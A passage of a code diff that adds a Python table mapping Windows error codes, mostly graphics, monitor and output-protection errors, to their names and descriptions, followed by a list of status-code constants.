+ 0xC00D32DC: ("NS_E_METADATA_INVALID_DOCUMENT_TYPE", "The metadata document is invalid."),
+ 0xC00D32DD: ("NS_E_METADATA_IDENTIFIER_NOT_AVAILABLE", "The metadata content identifier is not available."),
+ 0xC00D32DE: ("NS_E_METADATA_CANNOT_RETRIEVE_FROM_OFFLINE_CACHE", "Cannot retrieve metadata from the offline metadata cache."),
+ 0xC0261003: ("ERROR_MONITOR_INVALID_DESCRIPTOR_CHECKSUM", "Checksum of the obtained monitor descriptor is invalid."),
+ 0xC0261004: ("ERROR_MONITOR_INVALID_STANDARD_TIMING_BLOCK", "Monitor descriptor contains an invalid standard timing block."),
+ 0xC0261005: ("ERROR_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED", "Windows Management Instrumentation (WMI) data block registration failed for one of the MSMonitorClass WMI subclasses."),
+ 0xC0261006: ("ERROR_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK", "Provided monitor descriptor block is either corrupted or does not contain the monitor's detailed serial number."),
+ 0xC0261007: ("ERROR_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK", "Provided monitor descriptor block is either corrupted or does not contain the monitor's user-friendly name."),
+ 0xC0261008: ("ERROR_MONITOR_NO_MORE_DESCRIPTOR_DATA", "There is no monitor descriptor data at the specified (offset, size) region."),
+ 0xC0261009: ("ERROR_MONITOR_INVALID_DETAILED_TIMING_BLOCK", "Monitor descriptor contains an invalid detailed timing block."),
+ 0xC0262000: ("ERROR_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER", "Exclusive mode ownership is needed to create unmanaged primary allocation."),
+ 0xC0262001: ("ERROR_GRAPHICS_INSUFFICIENT_DMA_BUFFER", "The driver needs more direct memory access (DMA) buffer space to complete the requested operation."),
+ 0xC0262002: ("ERROR_GRAPHICS_INVALID_DISPLAY_ADAPTER", "Specified display adapter handle is invalid."),
+ 0xC0262003: ("ERROR_GRAPHICS_ADAPTER_WAS_RESET", "Specified display adapter and all of its state has been reset."),
+ 0xC0262004: ("ERROR_GRAPHICS_INVALID_DRIVER_MODEL", "The driver stack does not match the expected driver model."),
+ 0xC0262005: ("ERROR_GRAPHICS_PRESENT_MODE_CHANGED", "Present happened but ended up into the changed desktop mode."),
+ 0xC0262006: ("ERROR_GRAPHICS_PRESENT_OCCLUDED", "Nothing to present due to desktop occlusion."),
+ 0xC0262007: ("ERROR_GRAPHICS_PRESENT_DENIED", "Not able to present due to denial of desktop access."),
+ 0xC0262008: ("ERROR_GRAPHICS_CANNOTCOLORCONVERT", "Not able to present with color conversion."),
+ 0xC0262100: ("ERROR_GRAPHICS_NO_VIDEO_MEMORY", "Not enough video memory available to complete the operation."),
+ 0xC0262101: ("ERROR_GRAPHICS_CANT_LOCK_MEMORY", "Could not probe and lock the underlying memory of an allocation."),
+ 0xC0262102: ("ERROR_GRAPHICS_ALLOCATION_BUSY", "The allocation is currently busy."),
+ 0xC0262103: ("ERROR_GRAPHICS_TOO_MANY_REFERENCES", "An object being referenced has reach the maximum reference count already and cannot be referenced further."),
+ 0xC0262104: ("ERROR_GRAPHICS_TRY_AGAIN_LATER", "A problem could not be solved due to some currently existing condition. The problem should be tried again later."),
+ 0xC0262105: ("ERROR_GRAPHICS_TRY_AGAIN_NOW", "A problem could not be solved due to some currently existing condition. The problem should be tried again immediately."),
+ 0xC0262106: ("ERROR_GRAPHICS_ALLOCATION_INVALID", "The allocation is invalid."),
+ 0xC0262107: ("ERROR_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE", "No more unswizzling apertures are currently available."),
+ 0xC0262108: ("ERROR_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED", "The current allocation cannot be unswizzled by an aperture."),
+ 0xC0262109: ("ERROR_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION", "The request failed because a pinned allocation cannot be evicted."),
+ 0xC0262110: ("ERROR_GRAPHICS_INVALID_ALLOCATION_USAGE", "The allocation cannot be used from its current segment location for the specified operation."),
+ 0xC0262111: ("ERROR_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION", "A locked allocation cannot be used in the current command buffer."),
+ 0xC0262112: ("ERROR_GRAPHICS_ALLOCATION_CLOSED", "The allocation being referenced has been closed permanently."),
+ 0xC0262113: ("ERROR_GRAPHICS_INVALID_ALLOCATION_INSTANCE", "An invalid allocation instance is being referenced."),
+ 0xC0262114: ("ERROR_GRAPHICS_INVALID_ALLOCATION_HANDLE", "An invalid allocation handle is being referenced."),
+ 0xC0262115: ("ERROR_GRAPHICS_WRONG_ALLOCATION_DEVICE", "The allocation being referenced does not belong to the current device."),
+ 0xC0262116: ("ERROR_GRAPHICS_ALLOCATION_CONTENT_LOST", "The specified allocation lost its content."),
+ 0xC0262200: ("ERROR_GRAPHICS_GPU_EXCEPTION_ON_DEVICE", "Graphics processing unit (GPU) exception is detected on the given device. The device is not able to be scheduled."),
+ 0xC0262300: ("ERROR_GRAPHICS_INVALID_VIDPN_TOPOLOGY", "Specified video present network (VidPN) topology is invalid."),
+ 0xC0262301: ("ERROR_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED", "Specified VidPN topology is valid but is not supported by this model of the display adapter."),
+ 0xC0262302: ("ERROR_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED", "Specified VidPN topology is valid but is not supported by the display adapter at this time, due to current allocation of its resources."),
+ 0xC0262303: ("ERROR_GRAPHICS_INVALID_VIDPN", "Specified VidPN handle is invalid."),
+ 0xC0262304: ("ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE", "Specified video present source is invalid."),
+ 0xC0262305: ("ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET", "Specified video present target is invalid."),
+ 0xC0262306: ("ERROR_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED", "Specified VidPN modality is not supported (for example, at least two of the pinned modes are not cofunctional)."),
+ 0xC0262308: ("ERROR_GRAPHICS_INVALID_VIDPN_SOURCEMODESET", "Specified VidPN source mode set is invalid."),
+ 0xC0262309: ("ERROR_GRAPHICS_INVALID_VIDPN_TARGETMODESET", "Specified VidPN target mode set is invalid."),
+ 0xC026230A: ("ERROR_GRAPHICS_INVALID_FREQUENCY", "Specified video signal frequency is invalid."),
+ 0xC026230B: ("ERROR_GRAPHICS_INVALID_ACTIVE_REGION", "Specified video signal active region is invalid."),
+ 0xC026230C: ("ERROR_GRAPHICS_INVALID_TOTAL_REGION", "Specified video signal total region is invalid."),
+ 0xC0262310: ("ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE", "Specified video present source mode is invalid."),
+ 0xC0262311: ("ERROR_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE", "Specified video present target mode is invalid."),
+ 0xC0262312: ("ERROR_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET", "Pinned mode must remain in the set on VidPN's cofunctional modality enumeration."),
+ 0xC0262313: ("ERROR_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY", "Specified video present path is already in the VidPN topology."),
+ 0xC0262314: ("ERROR_GRAPHICS_MODE_ALREADY_IN_MODESET", "Specified mode is already in the mode set."),
+ 0xC0262315: ("ERROR_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET", "Specified video present source set is invalid."),
+ 0xC0262316: ("ERROR_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET", "Specified video present target set is invalid."),
+ 0xC0262317: ("ERROR_GRAPHICS_SOURCE_ALREADY_IN_SET", "Specified video present source is already in the video present source set."),
+ 0xC0262318: ("ERROR_GRAPHICS_TARGET_ALREADY_IN_SET", "Specified video present target is already in the video present target set."),
+ 0xC0262319: ("ERROR_GRAPHICS_INVALID_VIDPN_PRESENT_PATH", "Specified VidPN present path is invalid."),
+ 0xC026231A: ("ERROR_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY", "Miniport has no recommendation for augmentation of the specified VidPN topology."),
+ 0xC026231B: ("ERROR_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET", "Specified monitor frequency range set is invalid."),
+ 0xC026231C: ("ERROR_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE", "Specified monitor frequency range is invalid."),
+ 0xC026231D: ("ERROR_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET", "Specified frequency range is not in the specified monitor frequency range set."),
+ 0xC026231F: ("ERROR_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET", "Specified frequency range is already in the specified monitor frequency range set."),
+ 0xC0262320: ("ERROR_GRAPHICS_STALE_MODESET", "Specified mode set is stale. Reacquire the new mode set."),
+ 0xC0262321: ("ERROR_GRAPHICS_INVALID_MONITOR_SOURCEMODESET", "Specified monitor source mode set is invalid."),
+ 0xC0262322: ("ERROR_GRAPHICS_INVALID_MONITOR_SOURCE_MODE", "Specified monitor source mode is invalid."),
+ 0xC0262323: ("ERROR_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN", "Miniport does not have any recommendation regarding the request to provide a functional VidPN given the current display adapter configuration."),
+ 0xC0262324: ("ERROR_GRAPHICS_MODE_ID_MUST_BE_UNIQUE", "ID of the specified mode is already used by another mode in the set."),
+ 0xC0262325: ("ERROR_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION", "System failed to determine a mode that is supported by both the display adapter and the monitor connected to it."),
+ 0xC0262326: ("ERROR_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES", "Number of video present targets must be greater than or equal to the number of video present sources."),
+ 0xC0262327: ("ERROR_GRAPHICS_PATH_NOT_IN_TOPOLOGY", "Specified present path is not in the VidPN topology."),
+ 0xC0262328: ("ERROR_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE", "Display adapter must have at least one video present source."),
+ 0xC0262329: ("ERROR_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET", "Display adapter must have at least one video present target."),
+ 0xC026232A: ("ERROR_GRAPHICS_INVALID_MONITORDESCRIPTORSET", "Specified monitor descriptor set is invalid."),
+ 0xC026232B: ("ERROR_GRAPHICS_INVALID_MONITORDESCRIPTOR", "Specified monitor descriptor is invalid."),
+ 0xC026232C: ("ERROR_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET", "Specified descriptor is not in the specified monitor descriptor set."),
+ 0xC026232D: ("ERROR_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET", "Specified descriptor is already in the specified monitor descriptor set."),
+ 0xC026232E: ("ERROR_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE", "ID of the specified monitor descriptor is already used by another descriptor in the set."),
+ 0xC026232F: ("ERROR_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE", "Specified video present target subset type is invalid."),
+ 0xC0262330: ("ERROR_GRAPHICS_RESOURCES_NOT_RELATED", "Two or more of the specified resources are not related to each other, as defined by the interface semantics."),
+ 0xC0262331: ("ERROR_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE", "ID of the specified video present source is already used by another source in the set."),
+ 0xC0262332: ("ERROR_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE", "ID of the specified video present target is already used by another target in the set."),
+ 0xC0262333: ("ERROR_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET", "Specified VidPN source cannot be used because there is no available VidPN target to connect it to."),
+ 0xC0262334: ("ERROR_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER", "Newly arrived monitor could not be associated with a display adapter."),
+ 0xC0262335: ("ERROR_GRAPHICS_NO_VIDPNMGR", "Display adapter in question does not have an associated VidPN manager."),
+ 0xC0262336: ("ERROR_GRAPHICS_NO_ACTIVE_VIDPN", "VidPN manager of the display adapter in question does not have an active VidPN."),
+ 0xC0262337: ("ERROR_GRAPHICS_STALE_VIDPN_TOPOLOGY", "Specified VidPN topology is stale. Re-acquire the new topology."),
+ 0xC0262338: ("ERROR_GRAPHICS_MONITOR_NOT_CONNECTED", "There is no monitor connected on the specified video present target."),
+ 0xC0262339: ("ERROR_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY", "Specified source is not part of the specified VidPN topology."),
+ 0xC026233A: ("ERROR_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE", "Specified primary surface size is invalid."),
+ 0xC026233B: ("ERROR_GRAPHICS_INVALID_VISIBLEREGION_SIZE", "Specified visible region size is invalid."),
+ 0xC026233C: ("ERROR_GRAPHICS_INVALID_STRIDE", "Specified stride is invalid."),
+ 0xC026233D: ("ERROR_GRAPHICS_INVALID_PIXELFORMAT", "Specified pixel format is invalid."),
+ 0xC026233E: ("ERROR_GRAPHICS_INVALID_COLORBASIS", "Specified color basis is invalid."),
+ 0xC026233F: ("ERROR_GRAPHICS_INVALID_PIXELVALUEACCESSMODE", "Specified pixel value access mode is invalid."),
+ 0xC0262340: ("ERROR_GRAPHICS_TARGET_NOT_IN_TOPOLOGY", "Specified target is not part of the specified VidPN topology."),
+ 0xC0262341: ("ERROR_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT", "Failed to acquire display mode management interface."),
+ 0xC0262342: ("ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE", "Specified VidPN source is already owned by a display mode manager (DMM) client and cannot be used until that client releases it."),
+ 0xC0262343: ("ERROR_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN", "Specified VidPN is active and cannot be accessed."),
+ 0xC0262344: ("ERROR_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL", "Specified VidPN present path importance ordinal is invalid."),
+ 0xC0262345: ("ERROR_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION", "Specified VidPN present path content geometry transformation is invalid."),
+ 0xC0262346: ("ERROR_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED", "Specified content geometry transformation is not supported on the respective VidPN present path."),
+ 0xC0262347: ("ERROR_GRAPHICS_INVALID_GAMMA_RAMP", "Specified gamma ramp is invalid."),
+ 0xC0262348: ("ERROR_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED", "Specified gamma ramp is not supported on the respective VidPN present path."),
+ 0xC0262349: ("ERROR_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED", "Multisampling is not supported on the respective VidPN present path."),
+ 0xC026234A: ("ERROR_GRAPHICS_MODE_NOT_IN_MODESET", "Specified mode is not in the specified mode set."),
+ 0xC026234D: ("ERROR_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON", "Specified VidPN topology recommendation reason is invalid."),
+ 0xC026234E: ("ERROR_GRAPHICS_INVALID_PATH_CONTENT_TYPE", "Specified VidPN present path content type is invalid."),
+ 0xC026234F: ("ERROR_GRAPHICS_INVALID_COPYPROTECTION_TYPE", "Specified VidPN present path copy protection type is invalid."),
+ 0xC0262350: ("ERROR_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS", "No more than one unassigned mode set can exist at any given time for a given VidPN source or target."),
+ 0xC0262352: ("ERROR_GRAPHICS_INVALID_SCANLINE_ORDERING", "The specified scan line ordering type is invalid."),
+ 0xC0262353: ("ERROR_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED", "Topology changes are not allowed for the specified VidPN."),
+ 0xC0262354: ("ERROR_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS", "All available importance ordinals are already used in the specified topology."),
+ 0xC0262355: ("ERROR_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT", "Specified primary surface has a different private format attribute than the current primary surface."),
+ 0xC0262356: ("ERROR_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM", "Specified mode pruning algorithm is invalid."),
+ 0xC0262400: ("ERROR_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED", "Specified display adapter child device already has an external device connected to it."),
+ 0xC0262401: ("ERROR_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED", "The display adapter child device does not support reporting a descriptor."),
+ 0xC0262430: ("ERROR_GRAPHICS_NOT_A_LINKED_ADAPTER", "The display adapter is not linked to any other adapters."),
+ 0xC0262431: ("ERROR_GRAPHICS_LEADLINK_NOT_ENUMERATED", "Lead adapter in a linked configuration was not enumerated yet."),
+ 0xC0262432: ("ERROR_GRAPHICS_CHAINLINKS_NOT_ENUMERATED", "Some chain adapters in a linked configuration were not enumerated yet."),
+ 0xC0262433: ("ERROR_GRAPHICS_ADAPTER_CHAIN_NOT_READY", "The chain of linked adapters is not ready to start because of an unknown failure."),
+ 0xC0262434: ("ERROR_GRAPHICS_CHAINLINKS_NOT_STARTED", "An attempt was made to start a lead link display adapter when the chain links were not started yet."),
+ 0xC0262435: ("ERROR_GRAPHICS_CHAINLINKS_NOT_POWERED_ON", "An attempt was made to turn on a lead link display adapter when the chain links were turned off."),
+ 0xC0262436: ("ERROR_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE", "The adapter link was found to be in an inconsistent state. Not all adapters are in an expected PNP or power state."),
+ 0xC0262438: ("ERROR_GRAPHICS_NOT_POST_DEVICE_DRIVER", "The driver trying to start is not the same as the driver for the posted display adapter."),
+ 0xC0262500: ("ERROR_GRAPHICS_OPM_NOT_SUPPORTED", "The driver does not support Output Protection Manager (OPM)."),
+ 0xC0262501: ("ERROR_GRAPHICS_COPP_NOT_SUPPORTED", "The driver does not support Certified Output Protection Protocol (COPP)."),
+ 0xC0262502: ("ERROR_GRAPHICS_UAB_NOT_SUPPORTED", "The driver does not support a user-accessible bus (UAB)."),
+ 0xC0262503: ("ERROR_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS", "The specified encrypted parameters are invalid."),
+ 0xC0262504: ("ERROR_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL", "An array passed to a function cannot hold all of the data that the function wants to put in it."),
+ 0xC0262505: ("ERROR_GRAPHICS_OPM_NO_VIDEO_OUTPUTS_EXIST", "The GDI display device passed to this function does not have any active video outputs."),
+ 0xC0262506: ("ERROR_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME", "The protected video path (PVP) cannot find an actual GDI display device that corresponds to the passed-in GDI display device name."),
+ 0xC0262507: ("ERROR_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP", "This function failed because the GDI display device passed to it was not attached to the Windows desktop."),
+ 0xC0262508: ("ERROR_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED", "The PVP does not support mirroring display devices because they do not have video outputs."),
+ 0xC026250A: ("ERROR_GRAPHICS_OPM_INVALID_POINTER", "The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, it points to an invalid address, it points to a kernel mode address, or it is not correctly aligned."),
+ 0xC026250B: ("ERROR_GRAPHICS_OPM_INTERNAL_ERROR", "An internal error caused this operation to fail."),
+ 0xC026250C: ("ERROR_GRAPHICS_OPM_INVALID_HANDLE", "The function failed because the caller passed in an invalid OPM user mode handle."),
+ 0xC026250D: ("ERROR_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE", "This function failed because the GDI device passed to it did not have any monitors associated with it."),
+ 0xC026250E: ("ERROR_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH", "A certificate could not be returned because the certificate buffer passed to the function was too small."),
+ 0xC026250F: ("ERROR_GRAPHICS_OPM_SPANNING_MODE_ENABLED", "A video output could not be created because the frame buffer is in spanning mode."),
+ 0xC0262510: ("ERROR_GRAPHICS_OPM_THEATER_MODE_ENABLED", "A video output could not be created because the frame buffer is in theater mode."),
+ 0xC0262511: ("ERROR_GRAPHICS_PVP_HFS_FAILED", "The function call failed because the display adapter's hardware functionality scan failed to validate the graphics hardware."),
+ 0xC0262512: ("ERROR_GRAPHICS_OPM_INVALID_SRM", "The High-Bandwidth Digital Content Protection (HDCP) System Renewability Message (SRM) passed to this function did not comply with section 5 of the HDCP 1.1 specification."),
+ 0xC0262513: ("ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP", "The video output cannot enable the HDCP system because it does not support it."),
+ 0xC0262514: ("ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP", "The video output cannot enable analog copy protection because it does not support it."),
+ 0xC0262515: ("ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA", "The video output cannot enable the Content Generation Management System Analog (CGMS-A) protection technology because it does not support it."),
+ 0xC0262516: ("ERROR_GRAPHICS_OPM_HDCP_SRM_NEVER_SET", "IOPMVideoOutput's GetInformation() method cannot return the version of the SRM being used because the application never successfully passed an SRM to the video output."),
+ 0xC0262517: ("ERROR_GRAPHICS_OPM_RESOLUTION_TOO_HIGH", "IOPMVideoOutput's Configure() method cannot enable the specified output protection technology because the output's screen resolution is too high."),
+ 0xC0262518: ("ERROR_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE", "IOPMVideoOutput's Configure() method cannot enable HDCP because the display adapter's HDCP hardware is already being used by other physical outputs."),
+ 0xC0262519: ("ERROR_GRAPHICS_OPM_VIDEO_OUTPUT_NO_LONGER_EXISTS", "The operating system asynchronously destroyed this OPM video output because the operating system's state changed. This error typically occurs because the monitor physical device object (PDO) associated with this video output was removed, the monitor PDO associated with this video output was stopped, the video output's session became a nonconsole session or the video output's desktop became an inactive desktop."),
+ 0xC026251A: ("ERROR_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS", "IOPMVideoOutput's methods cannot be called when a session is changing its type. There are currently three types of sessions: console, disconnected and remote (remote desktop protocol [RDP] or Independent Computing Architecture [ICA])."),
+ 0xC0262580: ("ERROR_GRAPHICS_I2C_NOT_SUPPORTED", "The monitor connected to the specified video output does not have an I2C bus."),
+ 0xC0262581: ("ERROR_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST", "No device on the I2C bus has the specified address."),
+ 0xC0262582: ("ERROR_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA", "An error occurred while transmitting data to the device on the I2C bus."),
+ 0xC0262583: ("ERROR_GRAPHICS_I2C_ERROR_RECEIVING_DATA", "An error occurred while receiving data from the device on the I2C bus."),
+ 0xC0262584: ("ERROR_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED", "The monitor does not support the specified Virtual Control Panel (VCP) code."),
+ 0xC0262585: ("ERROR_GRAPHICS_DDCCI_INVALID_DATA", "The data received from the monitor is invalid."),
+ 0xC0262586: ("ERROR_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE", "A function call failed because a monitor returned an invalid Timing Status byte when the operating system used the Display Data Channel Command Interface (DDC/CI) Get Timing Report and Timing Message command to get a timing report from a monitor."),
+ 0xC0262587: ("ERROR_GRAPHICS_MCA_INVALID_CAPABILITIES_STRING", "The monitor returned a DDC/CI capabilities string that did not comply with the ACCESS.bus 3.0, DDC/CI 1.1 or MCCS 2 Revision 1 specification."),
+ 0xC0262588: ("ERROR_GRAPHICS_MCA_INTERNAL_ERROR", "An internal Monitor Configuration API error occurred."),
+ 0xC0262589: ("ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND", "An operation failed because a DDC/CI message had an invalid value in its command field."),
+ 0xC026258A: ("ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH", "This error occurred because a DDC/CI message length field contained an invalid value."),
+ 0xC026258B: ("ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM", "This error occurred because the value in a DDC/CI message checksum field did not match the message's computed checksum value. This error implies that the data was corrupted while it was being transmitted from a monitor to a computer."),
+ 0xC02625D6: ("ERROR_GRAPHICS_PMEA_INVALID_MONITOR", "The HMONITOR no longer exists, is not attached to the desktop, or corresponds to a mirroring device."),
+ 0xC02625D7: ("ERROR_GRAPHICS_PMEA_INVALID_D3D_DEVICE", "The Direct3D (D3D) device's GDI display device no longer exists, is not attached to the desktop, or is a mirroring display device."),
+ 0xC02625D8: ("ERROR_GRAPHICS_DDCCI_CURRENT_CURRENT_VALUE_GREATER_THAN_MAXIMUM_VALUE", "A continuous VCP code's current value is greater than its maximum value. This error code indicates that a monitor returned an invalid value."),
+ 0xC02625D9: ("ERROR_GRAPHICS_MCA_INVALID_VCP_VERSION", "The monitor's VCP Version (0xDF) VCP code returned an invalid version value."),
+ 0xC02625DA: ("ERROR_GRAPHICS_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION", "The monitor does not comply with the Monitor Control Command Set (MCCS) specification it claims to support."),
+ 0xC02625DB: ("ERROR_GRAPHICS_MCA_MCCS_VERSION_MISMATCH", "The MCCS version in a monitor's mccs_ver capability does not match the MCCS version the monitor reports when the VCP Version (0xDF) VCP code is used."),
+ 0xC02625DC: ("ERROR_GRAPHICS_MCA_UNSUPPORTED_MCCS_VERSION", "The Monitor Configuration API only works with monitors that support the MCCS 1.0 specification, the MCCS 2.0 specification, or the MCCS 2.0 Revision 1 specification."),
+ 0xC02625DE: ("ERROR_GRAPHICS_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED", "The monitor returned an invalid monitor technology type. CRT, plasma, and LCD (TFT) are examples of monitor technology types. This error implies that the monitor violated the MCCS 2.0 or MCCS 2.0 Revision 1 specification."),
+ 0xC02625DF: ("ERROR_GRAPHICS_MCA_UNSUPPORTED_COLOR_TEMPERATURE", "The SetMonitorColorTemperature() caller passed a color temperature to it that the current monitor did not support. CRT, plasma, and LCD (TFT) are examples of monitor technology types. This error implies that the monitor violated the MCCS 2.0 or MCCS 2.0 Revision 1 specification."),
+ 0xC02625E0: ("ERROR_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED", "This function can be used only if a program is running in the local console session. It cannot be used if the program is running on a remote desktop session or on a terminal server session."),
+}
+
+# Error Codes
+
+STG_S_CONVERTED = 0x00030200
+STG_S_BLOCK = 0x00030201
+STG_S_RETRYNOW = 0x00030202
+STG_S_MONITORING = 0x00030203
+STG_S_MULTIPLEOPENS = 0x00030204
+STG_S_CONSOLIDATIONFAILED = 0x00030205
+STG_S_CANNOTCONSOLIDATE = 0x00030206
+OLE_S_USEREG = 0x00040000
+OLE_S_STATIC = 0x00040001
+OLE_S_MAC_CLIPFORMAT = 0x00040002
+DRAGDROP_S_DROP = 0x00040100
+DRAGDROP_S_CANCEL = 0x00040101
+DRAGDROP_S_USEDEFAULTCURSORS = 0x00040102
+DATA_S_SAMEFORMATETC = 0x00040130
+VIEW_S_ALREADY_FROZEN = 0x00040140
+CACHE_S_FORMATETC_NOTSUPPORTED = 0x00040170
+CACHE_S_SAMECACHE = 0x00040171
+CACHE_S_SOMECACHES_NOTUPDATED = 0x00040172
+OLEOBJ_S_INVALIDVERB = 0x00040180
+OLEOBJ_S_CANNOT_DOVERB_NOW = 0x00040181
+OLEOBJ_S_INVALIDHWND = 0x00040182
+INPLACE_S_TRUNCATED = 0x000401A0
+CONVERT10_S_NO_PRESENTATION = 0x000401C0
+MK_S_REDUCED_TO_SELF = 0x000401E2
+MK_S_ME = 0x000401E4
+MK_S_HIM = 0x000401E5
+MK_S_US = 0x000401E6
+MK_S_MONIKERALREADYREGISTERED = 0x000401E7
+EVENT_S_SOME_SUBSCRIBERS_FAILED = 0x00040200
+EVENT_S_NOSUBSCRIBERS = 0x00040202
+SCHED_S_TASK_READY = 0x00041300
+SCHED_S_TASK_RUNNING = 0x00041301
+SCHED_S_TASK_DISABLED = 0x00041302
+SCHED_S_TASK_HAS_NOT_RUN = 0x00041303
+SCHED_S_TASK_NO_MORE_RUNS = 0x00041304
+SCHED_S_TASK_NOT_SCHEDULED = 0x00041305
+SCHED_S_TASK_TERMINATED = 0x00041306
+SCHED_S_TASK_NO_VALID_TRIGGERS = 0x00041307
+SCHED_S_EVENT_TRIGGER = 0x00041308
+SCHED_S_SOME_TRIGGERS_FAILED = 0x0004131B
+SCHED_S_BATCH_LOGON_PROBLEM = 0x0004131C
+XACT_S_ASYNC = 0x0004D000
+XACT_S_READONLY = 0x0004D002
+XACT_S_SOMENORETAIN = 0x0004D003
+XACT_S_OKINFORM = 0x0004D004
+XACT_S_MADECHANGESCONTENT = 0x0004D005
+XACT_S_MADECHANGESINFORM = 0x0004D006
+XACT_S_ALLNORETAIN = 0x0004D007
+XACT_S_ABORTING = 0x0004D008
+XACT_S_SINGLEPHASE = 0x0004D009
+XACT_S_LOCALLY_OK = 0x0004D00A
+XACT_S_LASTRESOURCEMANAGER = 0x0004D010
+CO_S_NOTALLINTERFACES = 0x00080012
+CO_S_MACHINENAMENOTFOUND = 0x00080013
+SEC_I_CONTINUE_NEEDED = 0x00090312
+SEC_I_COMPLETE_NEEDED = 0x00090313
+SEC_I_COMPLETE_AND_CONTINUE = 0x00090314
+SEC_I_LOCAL_LOGON = 0x00090315
+SEC_I_CONTEXT_EXPIRED = 0x00090317
+SEC_I_INCOMPLETE_CREDENTIALS = 0x00090320
+SEC_I_RENEGOTIATE = 0x00090321
+SEC_I_NO_LSA_CONTEXT = 0x00090323
+SEC_I_SIGNATURE_NEEDED = 0x0009035C
+CRYPT_I_NEW_PROTECTION_REQUIRED = 0x00091012
+NS_S_CALLPENDING = 0x000D0000
+NS_S_CALLABORTED = 0x000D0001
+NS_S_STREAM_TRUNCATED = 0x000D0002
+NS_S_REBUFFERING = 0x000D0BC8
+NS_S_DEGRADING_QUALITY = 0x000D0BC9
+NS_S_TRANSCRYPTOR_EOF = 0x000D0BDB
+NS_S_WMP_UI_VERSIONMISMATCH = 0x000D0FE8
+NS_S_WMP_EXCEPTION = 0x000D0FE9
